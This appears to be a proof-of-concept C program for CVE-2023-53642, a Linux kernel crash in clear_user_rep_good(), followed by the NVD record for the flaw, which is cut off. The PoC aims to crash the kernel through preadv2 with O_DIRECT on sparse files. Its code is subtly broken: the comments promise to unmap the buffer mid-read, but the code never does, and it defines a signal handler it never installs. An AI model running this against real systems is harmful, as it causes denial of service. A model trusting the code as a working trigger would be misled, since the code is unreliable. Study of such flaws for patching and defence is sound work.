CVE-2023-53642

/* CVE-2023-53642 PoC - Trigger kernel oops via incorrect exception annotation in clear_user_rep_good() * This PoC triggers the vulnerability by performing a readv/preadv operation * on a file with a direct I/O path that eventually calls clear_user on * a user-space buffer that causes a page fault. * * Compile: gcc -o poc poc.c * Run: ./poc <target_file> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/uio.h> #include <sys/stat.h> #include <sys/mman.h> #include <signal.h> #define BUFFER_SIZE 4096 static void segfault_handler(int sig) { fprintf(stderr, "Signal %d received\n", sig); _exit(1); } int main(int argc, char *argv[]) { int fd; struct iovec iov; char *buf; off_t offset = 0; if (argc < 2) { fprintf(stderr, "Usage: %s <file>\n", argv[0]); return 1; } /* Map a buffer that will be munmap'd or made invalid during the read */ buf = mmap(NULL, BUFFER_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (buf == MAP_FAILED) { perror("mmap"); return 1; } /* Open file with O_DIRECT to trigger the iomap direct I/O path */ fd = open(argv[1], O_RDONLY | O_DIRECT); if (fd < 0) { /* Fallback to normal open if O_DIRECT is not supported */ fd = open(argv[1], O_RDONLY); if (fd < 0) { perror("open"); munmap(buf, BUFFER_SIZE); return 1; } } iov.iov_base = buf; iov.iov_len = BUFFER_SIZE; /* In a separate thread or via signal, unmap the buffer * while preadv is in progress to trigger a page fault * during clear_user_rep_good() */ /* Simple approach: use a file that will cause the read to * span a hole in the filesystem, triggering the zero-iter path */ /* Use preadv2 with RWF_HIPRI to trigger direct I/O path */ ssize_t ret = preadv2(fd, &iov, 1, offset, RWF_HIPRI); if (ret < 0) { perror("preadv2"); } else { printf("Read %zd bytes\n", ret); } close(fd); munmap(buf, BUFFER_SIZE); return 0; } /* * Alternative trigger: Use a sparse file with holes to trigger * the iomap_dio_hole_iter -> iov_iter_zero -> clear_user path * * Create sparse file: * dd if=/dev/zero of=sparse_file bs=1 count=0 seek=1000000 * * Then run the PoC against it with O_DIRECT to trigger the * zeroing of user buffer via clear_user_rep_good(). */

{"cve": {"id": "CVE-2023-53642", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:47.517", "lastModified": "2026-02-03T22:29:48.937", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86: fix clear_user_rep_good() exception handling annotation\n\nThis code no longer exists in mainline, because it was removed in\ncommit d2c95f9d6802 (\"x86: don't use REP_GOOD or ERMS for user memory\nclearing\") upstream.\n\nHowever, rather than backport the full range of x86 memory clearing and\ncopying cleanups, fix the exception table annotation placement for the\nfinal 'rep movsb' in clear_user_rep_good(): rather than pointing at the\nactual instruction that did the user space access, it pointed to the\nregister move just before it.\n\nThat made sense from a code flow standpoint, but not from an actual\nusage standpoint: it means that if user access takes an exception, the\nexception handler won't actually find the instruction in the exception\ntables.\n\nAs a result, rather than fixing it up and returning -EFAULT, it would\nthen turn it into a kernel oops report instead, something like:\n\n BUG: unable to handle page fault for address: 0000000020081000\n #PF: supervisor write access in kernel mode\n #PF: error_code(0x0002) - not-present page\n ...\n RIP: 0010:clear_user_rep_good+0x1c/0x30 arch/x86/lib/clear_page_64.S:147\n ...\n Call Trace:\n __clear_user arch/x86/include/asm/uaccess_64.h:103 [inline]\n clear_user arch/x86/include/asm/uaccess_64.h:124 [inline]\n iov_iter_zero+0x709/0x1290 lib/iov_iter.c:800\n iomap_dio_hole_iter fs/iomap/direct-io.c:389 [inline]\n iomap_dio_iter fs/iomap/direct-io.c:440 [inline]\n __iomap_dio_rw+0xe3d/0x1cd0 fs/iomap/direct-io.c:601\n iomap_dio_rw+0x40/0xa0 fs/iomap/direct-io.c:689\n ext4_dio_read_iter fs/ext4/file.c:94 [inline]\n ext4_file_read_iter+0x4be/0x690 fs/ext4/file.c:145\n call_read_iter include/linux/fs.h:2183 [inline]\n do_iter_readv_writev+0x2e0/0x3b0 fs/read_write.c:733\n do_iter_read+0x2f2/0x750 fs/read_write.c:796\n vfs_readv+0xe5/0x150 fs/read_write.c:916\n do_preadv+0x1b6/0x270 fs/read_write.c:1008\n __do_sys_preadv2 fs/read_write.c:1070 [inline]\n __se_sys_preadv2 fs/read_write.c:1061 [inline]\n __x64_sys_preadv2+0xef/0x150 fs/read_write.c:1061\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nwhich then looks like a filesystem bug rather than the incorrect\nexception annotation that it is.\n\n[ The alternative to this one-liner fix is to take the upstream series\n that cleans this all up:\n\n 68674f94ffc9 (\"x86: don't use REP_GOOD or ERMS for small memory copies\")\n 20f3337d350c (\"x86: don't use REP_GOOD or ERMS for small memory clearing\")\n adfcf4231b8c (\"x86: don't use REP_GOOD or ERMS for user memory copies\")\n * d2c95f9d6802 (\"x86: don't use REP_GOOD or ERMS for user memory clearing\")\n 3639a535587d (\"x86: move stac/clac from user copy routines into callers\")\n 577e6a7fd50d (\"x86: inline the 'rep movs' in user copies for the FSRM case\")\n 8c9b6a88b7e2 (\"x86: improve on the non-rep 'clear_user' function\")\n 427fda2c8a49 (\"x86: improve on the non-rep 'copy_user' function\")\n * e046fe5a36a9 (\"x86: set FSRS automatically on AMD CPUs that have FSRM\")\n e1f2750edc4a (\"x86: remove 'zerorest' argument from __copy_user_nocache()\")\n 034ff37d3407 (\"x86: rewrite '__copy_user_nocache' function\")\n\n with either the whole series or at a minimum the two marked commits\n being needed to fix this issue ]"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.29", "matchCriteriaId": "69A65F0E-38E0-4491-A1A6-176DA6E5B276"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.16", "matchCriteriaId": "F92F7C8E-A977-4255-B1B6-D1908D8B408F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:* ... (truncated)